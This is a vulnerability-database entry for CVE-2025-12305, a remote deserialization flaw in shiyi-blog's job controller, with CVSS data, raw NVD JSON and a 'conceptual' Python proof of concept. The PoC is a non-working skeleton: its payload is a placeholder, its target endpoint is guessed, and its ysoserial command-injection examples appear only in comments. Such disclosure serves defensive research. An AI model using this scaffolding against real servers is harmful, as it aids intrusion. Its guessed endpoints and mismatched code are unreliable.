Security Vulnerability Report
CVE-2025-12305 CVSS 6.3 MEDIUM

Published: 2025-10-27 19:16:02
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was found in quequnlong shiyi-blog up to 1.2.1. This impacts an unknown function of the file src/main/java/com/mojian/controller/SysJobController.java of the component Job Handler. The manipulation results in deserialization. The attack can be executed remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score: 6.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:quequnlong:shiyi-blog:*:*:*:*:*:*:*:* - VULNERABLE
shiyi-blog <= 1.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import pickle
import base64
import requests

# CVE-2025-12305 PoC - shiyi-blog Deserialization RCE
# This is a conceptual PoC for educational purposes only
# Note: Actual exploitation requires identifying the specific gadget chain
# and the vulnerable deserialization point in SysJobController.java


def generate_malicious_payload(gadget_chain='commons-collections'):
    """
    Generate malicious serialized payload using ysoserial concept
    gadget_chain: commons-collections, spring-aop, etc.
    """
    # In real scenario, use ysoserial tool:
    # java -jar ysoserial.jar [gadget-chain] 'command'
    # Example: java -jar ysoserial.jar CommonsCollections6 'touch /tmp/pwned'
    # This is a placeholder - actual payload generation requires:
    # 1. ysoserial tool
    # 2. Identification of available gadget chains in the application
    # 3. Specific target endpoint in SysJobController
    # Example command to generate payload:
    # payload = subprocess.check_output([
    #     'java', '-jar', 'ysoserial.jar', gadget_chain, 'whoami'
    # ])
    return b'MALICIOUS_SERIALIZED_DATA_PLACEHOLDER'


def exploit_target(target_url, payload):
    """
    Send malicious payload to vulnerable endpoint
    """
    # Target endpoint typically in Job Handler:
    # /api/job/execute or similar endpoint in SysJobController
    headers = {
        'Content-Type': 'application/x-java-serialized-object',
        'User-Agent': 'Mozilla/5.0'
    }
    try:
        # Example POST request to trigger deserialization
        # response = requests.post(
        #     f'{target_url}/api/sysjob/execute',
        #     data=payload,
        #     headers=headers,
        #     timeout=10
        # )
        pass
    except requests.exceptions.RequestException as e:
        print(f'Request failed: {e}')


if __name__ == '__main__':
    # Usage example:
    # target = 'http://vulnerable-server:8080'
    # payload = generate_malicious_payload('commons-collections6')
    # exploit_target(target, payload)
    print('PoC for CVE-2025-12305 - shiyi-blog Deserialization RCE')
    print('Use ysoserial to generate actual payload')
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12305", "sourceIdentifier": "[email protected]", "published": "2025-10-27T19:16:01.790", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in quequnlong shiyi-blog up to 1.2.1. This impacts an unknown function of the file src/main/java/com/mojian/controller/SysJobController.java of the component Job Handler. The manipulation results in deserialization. The attack can be executed remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-502"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": true, "criteria": "cpe:2.3:a:quequnlong:shiyi-blog:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.2.1", "matchCriteriaId": "CFC83719-EDCB-49AF-B0BA-A5E649A808F4"}]}]}], "references": [{"url": "https://github.com/dongodid/cve-sub/blob/main/shiyi-blog/RCE.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329977", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329977", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.676725", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.676730", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}